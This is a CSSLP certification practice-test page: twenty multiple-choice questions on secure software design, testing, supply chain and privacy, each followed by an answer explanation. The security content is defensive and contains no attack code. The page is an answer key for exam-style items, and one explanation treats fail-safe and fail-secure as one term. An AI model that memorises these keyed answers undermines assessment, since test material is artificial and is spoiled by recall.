ISC2 Certified Secure Software Lifecycle Professional (CSSLP) Practice Test
Use the form below to configure your ISC2 Certified Secure Software Lifecycle Professional (CSSLP) Practice Test. The practice test can be configured to only include certain exam objectives and domains. You can choose between 5-100 questions and set a time limit.

ISC2 Certified Secure Software Lifecycle Professional (CSSLP) Information
What is the CSSLP Certification
The Certified Secure Software Lifecycle Professional (CSSLP) from ISC2 validates that a software professional can integrate security best practices into every phase of the development life cycle. While many security credentials focus on infrastructure or operations, CSSLP zeroes in on building security in from the first requirements workshop through retirement of an application. Holding the certification signals to employers and customers that you can help reduce vulnerabilities, meet compliance mandates, and ultimately ship more resilient software.
How the Exam Is Structured
The current CSSLP exam is a computer-based test containing 125 multiple-choice questions delivered over a three-hour session. A scaled score of 700 out of 1,000 is required to pass. Content is distributed across eight domains that mirror the secure software development life cycle: 1) Secure Software Concepts, 2) Secure Software Requirements, 3) Secure Software Architecture & Design, 4) Secure Software Implementation, 5) Secure Software Testing, 6) Secure Lifecycle Management, 7) Secure Software Deployment, Operations & Maintenance, and 8) Secure Software Supply Chain. Because any topic in these domains is fair game, candidates need both breadth and depth of knowledge across process models, threat modeling, secure coding, DevSecOps pipelines, and supply-chain risk management.
The Power of Practice Exams
One of the most effective ways to close a knowledge gap and build exam-day confidence is to take high-quality practice exams. Timed drills acclimate you to the three-hour pacing and help you learn how long you can spend on each question before moving on. Equally important, comprehensive explanations (not just answer keys) reveal why a particular choice is correct, which deepens conceptual understanding and highlights recurring exam patterns. Aim to review every explanation—even the questions you answer correctly—to reinforce core principles and discover alternate ways a concept can be tested. Track scores over multiple attempts; trending upward is a reliable indicator that your study plan is working.
Preparation Tips
Begin your study schedule at least eight to twelve weeks out, mapping the official ISC2 exam outline to specific learning resources such as the (ISC)² CSSLP CBK, OWASP documentation, and language-specific secure-coding references. After you’ve covered each domain, fold in practice exams and use their analytics to guide targeted review sessions. In the final two weeks, simulate the exam environment: mute notifications, sit for a full three-hour block, and practice reading every question twice before locking in an answer. Coupled with real-world experience and a disciplined study routine, these strategies position you to walk into the testing center—and out with the CSSLP credential—on your first attempt.

Free ISC2 Certified Secure Software Lifecycle Professional (CSSLP) Practice Test
- 20 Questions
- Unlimited time
- Secure Software ConceptsSecure Software Lifecycle ManagementSecure Software RequirementsSecure Software Architecture and DesignSecure Software ImplementationSecure Software TestingSecure Software Deployment, Operations, MaintenanceSecure Software Supply Chain
During an Agile project retrospective, the secure software lead is asked to redesign the organization's security-awareness program so that it meets role-based training expectations. Which approach most effectively fulfills the requirement to provide role-appropriate security training for developers, testers, and project managers?
Email the organization's secure coding standard to all staff and ask them to acknowledge that they have read it.
Require every team member to earn the same external penetration-testing certification regardless of their job function.
Create separate curricula that link security learning objectives to each role's tasks-for example, secure coding labs for developers, vulnerability test-case workshops for testers, and risk-based planning sessions for project managers.
Hold one annual, company-wide presentation on general security topics such as password hygiene and phishing, with no differentiation among roles.
Answer Description
Role-based security training must be directly relevant to what each job function does. The option that maps distinct learning objectives and hands-on activities to the daily responsibilities of developers (secure coding practices), testers (security test design and tool use), and project managers (risk-based planning and compliance oversight) delivers focused, actionable knowledge. A single generic awareness briefing, a one-size-fits-all penetration-testing course, or simply emailing standards without practice fails to address the specific skills and duties of each role, so they do not satisfy the exam's requirement for role-based security training.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is role-based security training?
Why is a single general security-awareness presentation insufficient?
How do secure coding labs help developers improve security?
During contract negotiations for a cloud-hosted authentication service, your organization insists that the provider stream security logs to your SIEM and apply critical security patches within an agreed period. Which contractual instrument is BEST suited to formalize and enforce these ongoing monitoring and vulnerability-response requirements?
A non-disclosure agreement outlining confidentiality and proprietary information handling
An intellectual-property assignment transferring ownership of custom-developed code
A code-escrow clause ensuring release of source code if the supplier becomes insolvent
A service-level agreement that specifies log delivery formats, frequency, and remediation timelines
Answer Description
A service-level agreement (SLA) is specifically intended to define measurable performance and service requirements that the supplier must meet throughout the life of the contract. Security-related SLAs commonly spell out log-generation formats, transmission frequency to the customer's SIEM, maximum time to notify of incidents, and deadlines for releasing patches or mitigations. A non-disclosure agreement focuses on confidentiality, not operational security obligations. A code-escrow clause only guarantees source-code availability if the vendor fails to support the product, and an intellectual-property assignment governs ownership rights, not day-to-day security monitoring or response expectations. Therefore, the SLA is the most appropriate vehicle for enforcing continuous logging and vulnerability-response commitments.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is a Service-Level Agreement (SLA)?
Why is an SLA better suited than an NDA for security-related commitments?
What is a Security Information and Event Management (SIEM) system?
What is an SLA in the context of cloud services?
Why is log delivery to a SIEM essential in security monitoring?
What are the key components of a security-focused SLA?
During security testing of a payment microservice in a staging cluster, you must confirm that the service fails safely if its hardware security module (HSM) suddenly becomes unreachable. Which testing action represents a targeted fault-injection test aimed at exercising this specific failure mode?
Launch a high-volume set of random, malformed TLS handshake messages at the microservice to see how it handles unexpected input.
Perform a static code review to look for unhandled exceptions around every HSM API invocation.
Intercept the microservice's calls to the HSM and programmatically force each request to time out before a response is returned.
Shut down the microservice's network interface card to observe how it behaves when all outbound traffic is blocked.
Answer Description
Fault injection deliberately introduces faults at the point where they would naturally occur so the team can observe error-handling behavior. Intercepting HSM API calls inside the microservice and forcing them to time out directly emulates the condition of an unresponsive HSM, allowing testers to verify graceful degradation and proper exception handling. Generating random TLS handshakes is fuzz testing that focuses on protocol parsing, not device failure. Reviewing source code is static analysis and does not actively introduce a fault. Disabling the microservice's entire network interface disrupts many functions and is closer to a broad resilience or chaos test, not a targeted injection at the HSM dependency.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is an HSM and why is it important in security testing?
How does fault injection differ from chaos testing?
What is fuzz testing, and why is it not the right choice in this case?
What is a Hardware Security Module (HSM)?
What is fault injection testing?
How does fault injection differ from fuzz testing?
During a quarterly review, a development manager asks for a single metric that shows how quickly the team fixes vulnerabilities identified by automated security scans in the CI/CD pipeline. Which metric will most directly satisfy this request and enable tracking of improvement over time?
Vulnerability density per thousand lines of code
Number of security champions assigned per scrum team
Percentage of code covered by unit tests
Mean Time to Remediate (MTTR) vulnerabilities
Answer Description
Mean Time to Remediate (sometimes called Average Remediation Time) measures the elapsed time between the discovery of a vulnerability and its successful fix in production or in the code repository. A shorter MTTR demonstrates that the team is responding to findings promptly, which is exactly what the manager wants to monitor. Vulnerability density focuses on the quantity of issues per code size, not the speed of resolution. Code-coverage percentages indicate testing breadth but reveal nothing about remediation speed. Counting security champions is a staffing measure, not a performance or timing metric.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is Mean Time to Remediate (MTTR)?
Why is MTTR preferred over vulnerability density for tracking remediation speed?
How can automated security scans in CI/CD pipelines help improve MTTR?
What is Mean Time to Remediate (MTTR) and why is it important?
How does MTTR differ from vulnerability density?
What are automated security scans in the CI/CD pipeline?
During planning for a new application that will be developed using a sequential Waterfall model, the security lead decides to add one security activity to each phase. Which activity is correctly matched to its Waterfall phase?
Conducting penetration testing during the design phase
Running static application security testing (SAST) during the implementation/coding phase
Defining security requirements during the coding/implementation phase
Performing threat modeling during the verification/testing phase
Answer Description
Static application security testing (SAST) examines source or binary code for defects and should be integrated while the code is being written, making the implementation/coding phase the appropriate point in a Waterfall project. Security requirements belong in the requirements phase, threat modeling is most effective during design, and penetration testing is normally scheduled for the testing/verification phase after the system is built.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is Static Application Security Testing (SAST)?
Why is the coding/implementation phase suitable for SAST?
What are some tools used for SAST?
While designing firmware updates for smart door locks in a corporate campus, you must ensure the locks are fail safe. If the update process crashes mid-way, which behavior best embodies the fail-safe principle?
The lock disables all authentication checks and accepts any remote open command for troubleshooting.
The lock automatically unlocks so occupants and technicians can enter and fix the issue.
The lock stays locked and can be opened only with a physical master key until the firmware is successfully restored.
The lock reboots every minute and retries the update, temporarily disabling normal lock functions.
Answer Description
The fail-safe (or fail-secure) principle requires that when a component fails it defaults to the most secure state, preventing unauthorized access even if usability is reduced. Keeping the lock engaged and forcing users to rely on a physical override key maintains security despite the software failure. Automatically unlocking, disabling authentication checks, or repeatedly rebooting may expose the facility to unauthorized entry or create a denial-of-service condition, so they do not satisfy the fail-safe requirement.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What does fail-safe mean in secure software design?
Why is a physical master key necessary for fail-safe designs in smart locks?
How does a fail-safe system differ from fail-open designs in security?
During an architecture review of a ride-sharing mobile app, you notice the client uploads raw GPS coordinates every five seconds, even when running in the background, to pre-match available rides. Which architectural change most effectively mitigates privacy risks associated with this implicit data collection while still allowing the feature to function?
Perform on-device processing of GPS data and send only coarse, tokenized area identifiers needed for ride matching.
Increase retention of uploaded location records to 90 days to support analytics and fraud investigations.
Route location uploads through a separate, dedicated API gateway isolated from other services.
Protect the GPS payload with TLS 1.3 encryption during transmission to the backend.
Answer Description
Processing the user's precise location locally on the device and transmitting only the minimum necessary information (for example, a coarse-grained or tokenized area identifier) applies the principle of data minimization. By limiting the granularity of the data that leaves the device, the architecture reduces the amount of personally identifiable location information exposed or stored, directly lowering privacy risk while preserving the matching feature. Simply encrypting transmissions protects data in transit but does not reduce what is collected; extending retention increases risk; and using a separate API gateway changes network topology without addressing the privacy issue of collecting fine-grained location data.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is data minimization in relation to user privacy?
How does on-device processing improve privacy?
What is the difference between TLS encryption and data minimization?
During vendor due diligence for incorporating open-source libraries, you must reference an internationally recognized standard that defines requirements for an open-source license compliance program within the software supply chain. Which ISO/IEC standard should you cite?
ISO/IEC 5230 OpenChain Specification
ISO/IEC 27034 Application Security
ISO/IEC 27036-4 ICT Supply Chain Security
ISO/IEC 12207 Software Life-Cycle Processes
Answer Description
ISO/IEC 5230, also known as the OpenChain Specification, is the only ISO/IEC standard that sets out the processes an organization should follow to establish and maintain an open-source license compliance program. ISO/IEC 27034 focuses on secure application development practices, ISO/IEC 12207 covers general software life-cycle processes, and ISO/IEC 27036-4 addresses broader ICT supply-chain security, none of which prescribe detailed OSS license compliance measures. Therefore, referring to ISO/IEC 5230 is the correct choice when assessing open-source license compliance within the software supply chain.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is ISO/IEC 5230 OpenChain Specification?
Why is open-source license compliance important in the software supply chain?
How does ISO/IEC 5230 compare to other ISO/IEC standards in software security?
What is ISO/IEC 5230 and why is it important?
How is ISO/IEC 5230 different from ISO/IEC 27034?
Why are ISO/IEC 12207 and ISO/IEC 27036-4 not suitable for open-source license compliance?
A development team is building an online banking API that must decide at run-time whether a user may transfer money between two accounts. The decision depends on current balances, daily limits, account ownership, and in-memory fraud flags. Which implementation best illustrates an imperative (programmatic) security approach for this need?
Set container securityContext fields to restrict network egress to the banking core and rely on the platform to block unauthorized calls.
Attach a pre-defined cloud IAM role to the container so only principals with that role can invoke any API endpoint.
Define allowed source and destination account pairs in a YAML policy file that the API gateway enforces at deployment time.
Write a validation routine inside the transferFunds() method that checks the requester's role, account ownership, real-time balances, and fraud flags before executing the transaction.
Answer Description
Imperative security embeds access-control logic directly in executable code so it can evaluate dynamic, context-specific information at run-time. Placing a transfer-authorization function inside the service method lets the application inspect live variables such as balances, limits, and fraud flags before permitting the operation. The other choices rely on external, largely static configurations (YAML policies, container manifests, or pre-defined cloud IAM roles) that describe permissions declaratively; they cannot easily incorporate the complex, per-request business logic required here.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is imperative security in programming?
Why is declarative security insufficient for dynamic checks?
How does the `transferFunds()` method ensure real-time security?
What does imperative security mean?
How does imperative security differ from declarative security?
Why is imperative security better for real-time contexts like an online banking API?
Your DevOps team is retiring a cloud-hosted microservice that stored protected health information (PHI) on provider-managed, hardware-encrypted SSD volumes. Because you cannot physically access or degauss the drives, you must satisfy NIST SP 800-88 purge requirements to ensure the data is permanently unrecoverable. Which destruction technique is most appropriate in this situation?
Degauss the underlying storage media to eliminate residual magnetism.
Delete the application files and empty the operating system's recycle bin.
Issue a cryptographic erase that destroys the drive's encryption keys, rendering all stored data unreadable.
Overwrite the entire volume once with zeros using a disk utility such as dd.
Answer Description
Cryptographic erasure meets the NIST SP 800-88 definition of a purge method by rendering data unrecoverable through destruction of the encryption keys protecting the media. Because the SSDs are managed by the cloud provider, you cannot rely on physical destruction or degaussing-and degaussing is ineffective on solid-state media anyway. Logical file deletion does not remove the data, and a single-pass overwrite may be insufficient or infeasible on SSDs whose controllers remap blocks. Therefore, issuing a cryptographic erase command that invalidates the drive's encryption keys is the most appropriate and reliable method for secure data destruction in this scenario.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is cryptographic erasure?
Why is degaussing ineffective on SSDs?
What are NIST SP 800-88 data purge requirements?
While hardening its CI/CD pipeline, a DevSecOps team decides to add a runtime control that can detect and block cross-site scripting attempts as they arrive from external clients. Which mechanism directly fulfills this requirement?
Sign each container image and verify the signature prior to deployment.
Deploy a cloud-based Web Application Firewall in front of the application to filter HTTP requests in real time.
Perform software composition analysis to identify vulnerable third-party libraries before packaging.
Run static application security testing on the codebase during the build phase.
Answer Description
A web application firewall (WAF) operates in real time between users and the application, inspecting each HTTP request and response. Because it can recognize malicious payloads such as cross-site scripting or SQL injection and block or sanitize them before they reach application code, it provides the desired runtime protection.
Static application security testing (SAST) analyzes source code or binaries during the build phase, not at runtime. Software composition analysis (SCA) inventories third-party components for known vulnerabilities but does not intercept live traffic. Container image signing verifies integrity before deployment; it has no visibility into or control over active HTTP sessions. Therefore, deploying a WAF is the only option that meets the requirement.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is a Web Application Firewall (WAF)?
How does a WAF detect and block cross-site scripting (XSS)?
Why can't static application security testing (SAST) replace a WAF for runtime protection?
What is a Web Application Firewall (WAF) and how does it prevent cross-site scripting?
What is the difference between runtime protection and build-time security practices like SAST?
Why doesn't container image signing address runtime protection requirements like detecting XSS?
Your organization runs a containerized web application on a managed Kubernetes cluster. To strengthen continuous monitoring, you must configure security telemetry sent to the SIEM so that attempted runtime privilege-escalation inside any container is detected as soon as it happens. Which data source should you prioritize forwarding?
Application access logs produced by the web servers in each container
Virtual network flow logs captured from the cluster's network interfaces
Kernel-level system call events collected by a container runtime or eBPF sensor
Scheduled configuration snapshots exported from the Kubernetes API server
Answer Description
Privilege escalation inside a running container is best identified by monitoring the low-level operating-system events that occur when a process tries to change its user or group privileges (for example, setuid or setgid system calls). Kernel-level system call telemetry gathered by a container runtime or eBPF-based sensor (such as Falco) surfaces these events in near real time, allowing the SIEM to alert immediately. Web-server access logs focus on HTTP requests and rarely expose internal privilege changes. Network flow logs show traffic patterns but not internal process activities. Periodic Kubernetes API snapshots capture configuration changes, not moment-to-moment actions occurring inside containers. Therefore, kernel-level system call events provide the most timely and reliable indication of container privilege escalation.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is eBPF and how does it help with monitoring in containers?
Why aren't application access logs sufficient for detecting privilege escalation?
What is a SIEM, and how does it use kernel-level system call telemetry?
During a security assessment of an internally developed RESTful microservice, you suspect there are API endpoints not included in the official design documentation. What test activity would be most effective for uncovering this undocumented functionality before production release?
Conduct black-box fuzzing that mutates URL paths and HTTP verbs to enumerate undisclosed endpoints
Execute unit tests derived from user story acceptance criteria
Run stress testing with production-like load to measure service scalability
Perform static analysis of source code to identify insecure cryptographic implementations
Answer Description
Undocumented functionality is best revealed by treating the system as an unknown environment and actively probing for behavior that is not described in specifications. Black-box fuzzing that mutates resource paths, query strings, headers, and HTTP verbs forces the service to respond to unexpected requests and helps enumerate hidden or forgotten endpoints. Other options fall short: static code analysis can expose coding errors but may miss runtime-only routes; stress testing focuses on performance, not functionality discovery; unit tests based on documented user stories are constrained to what is already known, so they cannot expose undocumented interfaces.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is black-box fuzzing?
How can mutated URL paths and HTTP verbs help uncover hidden API endpoints?
Why is black-box fuzzing preferred over static analysis for discovering undocumented endpoints?
What is black-box fuzzing?
Why is it important to find undocumented API endpoints?
How does black-box fuzzing differ from static code analysis?
While planning security for a new tele-medicine platform, the lead architect requests a threat-modeling approach that is explicitly risk-centric, walks through seven ordered stages from defining business objectives to selecting countermeasures, and incorporates attack simulation to quantify likelihood. Which methodology best fits these criteria?
Process for Attack Simulation and Threat Analysis (PASTA)
Common Vulnerability Scoring System (CVSS)
STRIDE
Security Content Automation Protocol (SCAP)
Answer Description
The Process for Attack Simulation and Threat Analysis (PASTA) is a seven-stage, risk-centric threat-modeling methodology. It begins by identifying business objectives and technical scope, then models and simulates plausible attacks to estimate risk, and finally maps security controls to the most significant threats. STRIDE is category-based and asset-centric, CVSS scores known vulnerabilities rather than modeling threats, and Security Content Automation Protocol (SCAP) is a standards framework for automating vulnerability management-not a threat-modeling process.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What are the seven stages of the PASTA methodology?
How does PASTA differ from STRIDE in terms of focus?
What makes attack simulation an essential step in PASTA?
What is PASTA in threat modeling?
How does PASTA differ from STRIDE?
Why is attack simulation critical in PASTA?
A developer is updating an e-commerce site to display customer-supplied product reviews in an HTML template. The reviews are saved in the database without modification. To stop attackers from injecting malicious scripts that execute in shoppers' browsers, which control should the developer add to the presentation layer?
Obfuscate the site's JavaScript files with a packer during the build process.
Require multi-factor authentication for users who submit reviews.
Reject any review whose length exceeds a predefined maximum.
Apply HTML entity encoding to the review text immediately before it is written to the page.
Answer Description
Cross-site scripting occurs when untrusted data is sent to a browser without proper output handling. The safest countermeasure is context-aware output encoding: before the review text is written into the HTML response, characters such as <, >, ", and & are converted to their corresponding HTML entities. This breaks any script tags an attacker might have stored, rendering them harmless. Merely limiting length, adding MFA, or obfuscating site JavaScript does not neutralize executable payloads in user-supplied content.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is HTML entity encoding?
What is Cross-Site Scripting (XSS)?
Why is context-aware output encoding important?
What is HTML entity encoding, and how does it work?
What is cross-site scripting (XSS), and why is it dangerous?
What is context-aware output encoding, and why is it important?
Your organization is deploying a new SIEM that will ingest security event data in near real-time from application servers located in branch offices connected over the public Internet. To prevent both eavesdropping on the log contents and the insertion of forged log messages while they are in transit, which log-transfer design should you recommend?
Send standard UDP syslog on port 514 across a dedicated management VLAN to limit exposure.
Use RFC 5425 syslog over TLS with mutual certificate authentication between every server and the SIEM.
Attach an HMAC to each log entry but forward them over unencrypted TCP to minimize overhead.
Batch log files hourly, compress them, and upload via FTP over an IP-whitelisted channel to the SIEM.
Answer Description
Using the TLS transport mapping for syslog defined in RFC 5425 establishes an encrypted channel that prevents packet sniffers from reading log contents (protecting confidentiality) and requires X.509 certificate-based mutual authentication between the log sender and receiver (providing strong source authentication and integrity). This combination directly mitigates the twin risks of eavesdropping and message injection. A plain UDP syslog feed on a separate VLAN offers no cryptographic protection. FTP, even over an IP-restricted path, transmits data unencrypted and relies on post-transfer integrity checks at best. Sending unsigned logs over unencrypted TCP, even if an HMAC were added, would still expose the data to interception and relies on a shared secret that cannot authenticate individual hosts as robustly as mutual TLS. Therefore, the RFC 5425 syslog-over-TLS approach is the most effective answer.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is RFC 5425 in the context of syslog?
Why is mutual TLS important for secure log transfer?
How does an HMAC differ from mutual TLS in securing logs?
What is RFC 5425?
Why is mutual certificate authentication important in syslog-over-TLS?
What is the main vulnerability of standard UDP syslog on port 514?
Your team must share user activity logs with a third-party analytics vendor. To reduce privacy risk while still allowing regulators to trace events back to individuals if necessary, the security architect proposes pseudonymizing the user IDs. Which requirement below best satisfies the definition of pseudonymization in this context?
Replace each user ID with a random unique token and store the mapping table in an encrypted repository accessible only to a small, authorized team.
Hash each user ID with a random salt and permanently delete the salt before sharing the data set.
Mask each user ID by showing only the last four characters to the analytics vendor.
Encrypt the entire log file with AES-256 and keep the encryption key in the same cloud account as the data.
Answer Description
Pseudonymization replaces direct identifiers with artificial identifiers while keeping the means to re-identify data subjects separate and protected. Storing the mapping table in an encrypted repository with very limited access preserves the ability to reverse the process when legally justified, yet prevents the analytics vendor from linking the data to real identities. Hashing and discarding the salt would make re-identification impossible, turning the data into anonymized form instead of pseudonymized. Encrypting the whole file without segregating the key offers confidentiality but not pseudonymization, because decryption automatically restores the identifiers. Simply masking part of the identifier leaves recognizable information exposed and is not considered pseudonymization under privacy regulations.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is pseudonymization in data privacy?
Why is hashing with a random salt not pseudonymization?
How does encrypting data differ from pseudonymization?
Your organization plans to adopt the OWASP Software Assurance Maturity Model (SAMM) to guide improvements to its secure software development process. According to SAMM's recommended rollout approach, which activity should the team perform first before setting any security objectives or defining an improvement roadmap?
Perform a baseline self-assessment to measure current maturity against SAMM security practices
Launch mandatory secure coding training for all development staff across the organization
Introduce a public bug-bounty program to discover previously unknown vulnerabilities
Deploy automated static application security testing (SAST) in every continuous integration pipeline
Answer Description
OWASP SAMM stresses that an organization must start by understanding where it currently stands. The model's initial step is a structured self-assessment that scores the maturity of each SAMM security practice. This baseline reveals strengths and gaps, allowing the team to set realistic targets and prioritize subsequent improvement activities. Deploying static analysis, launching secure coding training, or running a bug-bounty program are valuable tactics, but SAMM recommends pursuing such enhancements only after the initial assessment clarifies which practices need attention and at what maturity level.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is the OWASP Software Assurance Maturity Model (SAMM)?
Why is a baseline self-assessment critical in SAMM?
How does SAMM differ from automated tools like SAST?
During sprint planning, a development team wants to pull several open-source libraries from a public repository to speed delivery of a payment module. Based on SAFECode software assurance best-practice guidance, which approach most effectively reduces the risk of introducing insecure or malicious third-party components?
Pin each dependency to a specific version in the build script so the code base never changes without explicit developer action.
Select only the most downloaded libraries in the repository, assuming high adoption indicates stronger community vetting.
Scan every candidate library for known vulnerabilities and maintain ongoing monitoring and re-assessment as part of the project's secure supply-chain process.
Require that all third-party libraries carry an open-source license so their source code can be inspected if problems arise.
Answer Description
SAFECode recommends that organizations adopt a structured process for selecting and managing third-party software. This includes performing security scans of each component for known vulnerabilities before use, approving them through a defined governance process, and continuously monitoring them for newly disclosed issues during the product lifecycle. Simply locking versions, trusting popularity, or relying on open-source licensing alone does not adequately address hidden vulnerabilities or malicious code that may surface after initial selection.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is SAFECode, and why is it important in software assurance?
Why is scanning and monitoring third-party libraries necessary?
Why isn’t pinning dependency versions or relying on popularity enough to ensure security?
Your development team is drafting requirements for a new analytics microservice that will replicate EU customer profiles to a cloud region in Singapore. Which requirement best addresses cross-border privacy obligations that apply to this data movement?
Conclude Standard Contractual Clauses with the cloud host before exporting personal data.
Store the replica as compressed, read-only snapshots retained for five years.
Encrypt replicated tables with AES-256 and manage keys in a hardware security module.
Send replication traffic over a private dedicated inter-region link controlled by the CSP.
Answer Description
Under GDPR, exporting personal data outside the European Economic Area is lawful only when an adequate transfer mechanism is in place. Standard Contractual Clauses (SCCs) are one of the primary mechanisms allowed by Article 46 and must be executed with the recipient before any transfer occurs. While encryption, private links, and snapshot retention improve security or operational efficiency, none of them on their own satisfy the legal requirement for an appropriate international-transfer safeguard. Therefore, concluding SCCs with the cloud provider is the most appropriate privacy requirement.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What are Standard Contractual Clauses (SCCs) under GDPR?
Why is AES-256 encryption insufficient for cross-border data transfers under GDPR?
What is meant by an 'adequate transfer mechanism' under GDPR?
That's It!
Looks like that's it! You can go back and review your answers or click the button below to grade your test.